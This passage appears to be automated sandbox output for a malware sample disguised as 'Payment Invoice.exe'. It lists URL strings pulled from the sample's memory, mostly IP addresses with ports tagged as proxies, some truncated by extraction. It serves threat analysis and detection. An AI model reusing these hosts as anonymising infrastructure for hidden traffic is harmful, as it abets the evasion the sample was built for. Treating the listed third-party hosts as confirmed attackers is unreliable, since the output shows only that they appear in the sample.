                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.147.9:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.147.9:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.153.194:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.165.36:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.165.36:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.171.22:16379://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:38390
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.172.94.175:38390://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://163.44.253.160:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.132.170.100:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:52395
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:52395://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:59045
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:59045://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.237.188:59045P
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:50564
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:50564://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:57391
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163170D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:57391://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:60283
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:60283://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:64110
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://164.92.86.113:64110://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.227.154:5096
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.227.154:5096://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.227.154:5096p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.154.236.214:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.46.193:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.46.193:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.225:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.225:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.226:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.59.226:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.67.238:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.16.67.238:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.22.96.68:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.22.96.68:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.225.240.95:10605
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.225.240.95:10605://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.112.138:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.112.138:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.196.37:53718://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.95.2:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.227.95.2:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.158.60:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.158.60:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.89.116:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://165.232.89.116:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D77000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316DC2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.121.127:45248
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.121.127:45248://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.38.100:8730
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.38.100:8730://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.87.148:16744://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:49263
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://166.62.88.163:49263://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:37355://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39452HJ
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:39533://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:40825
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:40825://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:41491://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.109.12:46249://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.79.17:8000
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.172.79.17:8000://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.254.70:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.254.70:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.218:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.249.29.220:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.181.133:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.222.233:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.250.222.233:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.71.5.83:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.102.169:16823
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.102.169:16823://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B46000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163172B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.115.103:55066
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.115.103:55066://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:36394
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:36394://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:45364
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://167.86.69.142:45364://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.126.74.132:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.81.225:9090
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.81.225:9090://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.181.81.225:9090p
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171.16:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.194.171.16:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.196.158.15:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.196.158.15:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.13:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.13:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.37:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.205.217.37:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.228.36.22:27234
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.228.36.22:27234://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.90.255.60:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://168.90.255.60:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136:52178
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136:52178://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.223.136:52178x
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.45.51:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.239.45.51:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B09000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.255.198.8:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.255.198.8:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.146:8123
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.146:8123://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://169.57.157.148:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.210.121.190:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.210.121.190:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.238.180.21:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.238.180.21:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.1:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.1:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A0A000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163182A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.3:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.205.3:999://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.207.241:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.239.207.241:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.244.64.12:31476
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.244.64.12:31476://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.80.242.98:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.80.242.98:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.81.108.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.81.108.46:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://170.81.108.46:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.100.23.244:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.100.23.244:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.188:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.188:31280q
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.22.108.188:3128://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.235.166.222:4019
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.235.166.222:4019://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:13391
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:13391://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:24015
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:24015://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:27056
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:27056://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:37400
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:37400://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:5189
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.244.140.160:5189://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316ADE000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.248.209.6:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.248.209.6:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.97.107.108:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://171.97.107.108:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.104.145.22:9064
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317148000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.104.145.22:9064://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.173.132.85:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.233.255.11:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.233.255.11:31288
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.233.255.11:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.235.10.53://proxy
